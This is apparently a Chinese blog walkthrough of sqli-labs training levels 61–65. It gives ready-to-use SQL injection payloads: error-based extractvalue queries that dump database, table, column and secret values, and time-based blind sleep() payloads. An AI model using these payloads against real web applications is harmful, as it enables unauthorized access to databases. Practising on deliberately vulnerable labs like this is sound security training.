码迷,mamicode.com
首页 > 数据库 > 详细

sql-libs闯关61-65

时间:2020-03-08 16:08:44      阅读:97      评论:0      收藏:0      [点我收藏+]

标签:format   闯关   col   concat   ima   rac   表名   substr   错误   

 

第六十一关

和六十关基本一样,就是变成了单引号和双括号,这好像是第一次遇见双括号

爆数据库名   ?id=1‘))and extractvalue(1, concat(0x5c, (select database())))%23

技术图片

 

 

 爆表名    ?id=0‘)) union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘challenges‘),0x7e))--+

技术图片

 

 

  爆列名       ?id=-1‘)) union select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘e01xkjlffi‘),0x7e))--+

技术图片

 

 

 爆数据      ?id=-1‘)) union select extractvalue(1,concat(0x7e,(select group_concat(secret_SUO9) from e01xkjlffi),0x7e))--+

 技术图片

 

 

 搞定了!   x9UWIAkqAsbxXsjEsFOU9bH5

技术图片

 

 

 

 第六十二关

这关这次联合注入和报错注入都不可以了 ,那我们呢用盲注

?id=1%27)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(3))--+

 

 技术图片

 

 

 

 第六十三关

和六十二关基本一样,唯一区别在于需要使用单引号闭合

?id=0%27and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--+
正确时,错误时间长

技术图片

 

 

 

第六十四关

和六十二关基本一样,唯一区别在于需要使用括号闭合

?id=0))and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--+
正确时间短,错误时间长

技术图片

 

 

 

第六十五关

和六十二关基本一样,同上,只不过?id=1”) 正确延时

 ?id=1%22)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))--+
 技术图片

 

sql-libs闯关61-65

标签:format   闯关   col   concat   ima   rac   表名   substr   错误   

原文地址:https://www.cnblogs.com/swl0221/p/12442621.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!